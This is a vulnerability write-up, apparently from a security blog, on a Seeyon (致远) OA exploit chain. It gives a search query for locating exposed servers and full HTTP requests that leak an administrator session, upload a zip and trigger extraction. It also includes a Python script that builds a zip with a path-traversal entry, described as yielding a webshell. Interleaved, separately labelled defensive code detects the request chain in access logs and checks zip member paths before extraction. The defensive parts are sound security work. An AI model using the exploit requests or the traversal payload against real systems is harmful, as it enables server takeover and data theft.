致远OA (Seeyon OA) thirdpartyController.do Session Leak and Arbitrary File Upload Vulnerability

camer   ·   Posted on 2023-05-05 16:37:56   ·   Vulnerability articles

Vulnerability description:

In 致远OA, a specially crafted request returns a valid session; that session is then used against the file upload interface to upload a webshell and take control of the server.

Network mapping (search query):

title="致远"

Vulnerability reproduction:

Process:
First, construct a request to obtain the administrator's cookie; then, carrying that cookie, upload a zip archive and trigger its extraction, which yields a shell.

1. Obtain the cookie

  POST /seeyon/thirdpartyController.do HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
  Connection: close
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  DNT: 1
  Content-Type: application/x-www-form-urlencoded
  Host:
  Content-Length: 112

  method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4


2. Upload the zip archive

  POST /seeyon/fileUpload.do?method=processUpload&maxSize HTTP/1.1
  Content-Type: multipart/form-data; boundary=00content0boundary00
  Cookie: JSESSIONID=B0EA117AB78158D5B790953B453C1503
  User-Agent: Java/1.8.0_101
  Host:
  Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
  Content-Length: 975
  Connection: close

  --00content0boundary00
  Content-Disposition: form-data; name="type"

  --00content0boundary00
  Content-Disposition: form-data; name="extensions"

  --00content0boundary00
  Content-Disposition: form-data; name="applicationCategory"

  --00content0boundary00
  Content-Disposition: form-data; name="destDirectory"

  --00content0boundary00
  Content-Disposition: form-data; name="destFilename"

  --00content0boundary00
  Content-Disposition: form-data; name="maxSize"

  --00content0boundary00
  Content-Disposition: form-data; name="isEncrypt"

  --00content0boundary00
  Content-Disposition: form-data; name="file1"; filename="test.zip"
  Content-Type: application/x-zip-compressed

  [zip file contents]
  --00content0boundary00--


After the archive is uploaded with the cookie, the response returns an id that identifies the archive.
Note: this is a major pitfall. In actual testing, the file names inside the archive can only be digits, anything above 10 also fails to extract, and sometimes the archive must contain a layout.xml file (empty content is fine); otherwise extraction fails when the unzip vulnerability is exploited.

3. Extract

  POST /seeyon/ajax.do HTTP/1.1
  Cookie: JSESSIONID=B0EA117AB78158D5B790953B453C1503
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  User-Agent: Java/1.8.0_101
  Host:
  Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
  Content-Length: 142
  Connection: close

  method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=[0,"2023-02-05","-6448544356250399451"]
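The three steps above leave a distinctive footprint in the web server's access log: one client posts to thirdpartyController.do, then to fileUpload.do?method=processUpload, then to ajax.do, in that order. As an added defensive example (not code from the post), here is a small Python checker that parses combined-format log lines and reports every client that completed that chain in sequence. The log lines, IP addresses and timestamps are constructed for the example; the paths are the ones the write-up shows.

```python
import re
from collections import defaultdict

# Constructed sample lines in combined log format; the IPs are documentation ranges, not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [05/May/2023:16:30:01 +0800] "POST /seeyon/thirdpartyController.do HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [05/May/2023:16:30:03 +0800] "POST /seeyon/fileUpload.do?method=processUpload&maxSize HTTP/1.1" 200 88 "-" "Java/1.8.0_101"
203.0.113.7 - - [05/May/2023:16:30:05 +0800] "POST /seeyon/ajax.do HTTP/1.1" 200 31 "-" "Java/1.8.0_101"
198.51.100.9 - - [05/May/2023:16:31:00 +0800] "GET /seeyon/main.do HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.9 - - [05/May/2023:16:31:05 +0800] "POST /seeyon/ajax.do HTTP/1.1" 200 31 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# The three request stages of the write-up, in order: session grab, archive upload, unzip trigger.
CHAIN = [
    ("POST", "/seeyon/thirdpartyController.do"),
    ("POST", "/seeyon/fileUpload.do?method=processUpload"),
    ("POST", "/seeyon/ajax.do"),
]


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_chain(log_text):
    """Return {ip: [(timestamp, path, user_agent), ...]} for every client that
    completed all CHAIN stages in order. Unrelated requests in between are ignored."""
    next_stage = defaultdict(int)   # ip -> index of the stage still expected
    evidence = defaultdict(list)    # ip -> the matching requests seen so far
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip = rec["ip"]
        idx = next_stage[ip]
        if idx >= len(CHAIN):
            continue                # chain already complete for this client
        method, prefix = CHAIN[idx]
        if rec["method"] == method and rec["path"].startswith(prefix):
            next_stage[ip] = idx + 1
            evidence[ip].append((rec["ts"], rec["path"], rec["ua"]))
    return {ip: evidence[ip] for ip, n in next_stage.items() if n == len(CHAIN)}


if __name__ == "__main__":
    for ip, steps in detect_chain(SAMPLE_LOG).items():
        print(ip)
        for ts, path, ua in steps:
            print(f"  {ts}  {path}  ua={ua}")
```

The checker keys only on method and path, because the access log does not carry POST bodies; the `managerMethod=uploadPageLayoutAttachment` parameter of the third step is visible only where request bodies are logged (reverse proxy or WAF). Treat a hit as a triage lead rather than proof: an administrator's legitimate workflow can produce the same three paths, so correlate with whether the client had logged in before calling thirdpartyController.do and with an unusual User-Agent such as the Java one in the write-up's requests.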


4. Check the upload result

Note: script that generates the zip archive

  import zipfile

  # Open (or create) test.zip in append mode
  zf = zipfile.ZipFile('test.zip', mode='a', compression=zipfile.ZIP_DEFLATED)
  fname = '..\\1.txt'   # entry name with a parent-directory traversal component
  shellcode = "c9b3995f-2d74-448d-a742-34f72cfa1e14"   # marker string written as the file's content
  zf.writestr('layout.xml', "")   # empty layout.xml, required for the extraction to succeed (see note above)
  zf.writestr(fname, shellcode)
  zf.close()   # write the central directory so the archive is valid
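The entry name '..\\1.txt' in the script above is a zip path-traversal payload: whichever component unpacks the archive must resolve every member name against the extraction root before writing anything. As an added defensive example, not code from the post or from the product, here is that check in Python, applied to a constructed archive of the same shape (an empty layout.xml plus one traversal entry). The root path /var/app/uploads and the placeholder file content are assumptions.

```python
import io
import posixpath
import re
import zipfile


def is_unsafe_member(name, root):
    """True if extracting `name` under `root` would write outside `root`.
    Backslashes are treated as separators so Windows-style names such as '..\\1.txt'
    are caught on any platform; absolute paths and drive letters are rejected outright."""
    normalized = name.replace("\\", "/")
    if normalized.startswith("/") or re.match(r"^[A-Za-z]:", normalized):
        return True
    root = posixpath.normpath(root)
    target = posixpath.normpath(posixpath.join(root, normalized))
    return not (target == root or target.startswith(root + "/"))


def unsafe_entries(zip_bytes, root="/var/app/uploads"):
    """Names of archive members that fail the check above (root is a constructed path)."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if is_unsafe_member(n, root)]


def safe_extract(zip_bytes, dest):
    """Validate every member first and refuse the whole archive on any violation,
    instead of silently dropping the bad entries and extracting the rest."""
    bad = unsafe_entries(zip_bytes, dest)
    if bad:
        raise ValueError(f"archive rejected, traversal entries: {bad}")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)


def build_sample_zip():
    """Constructed archive shaped like the write-up's: an empty layout.xml plus an
    entry whose name climbs out of the extraction directory. Content is a placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("layout.xml", "")
        zf.writestr("..\\1.txt", "PLACEHOLDER")
    return buf.getvalue()


if __name__ == "__main__":
    print("unsafe members:", unsafe_entries(build_sample_zip()))
```

Rejecting the archive outright, rather than stripping the offending components and continuing, is the better design for an upload endpoint: it keeps the malformed archive out of the application entirely, and the rejection is an event worth alerting on, since a benign client has no reason to ship member names that escape the destination directory.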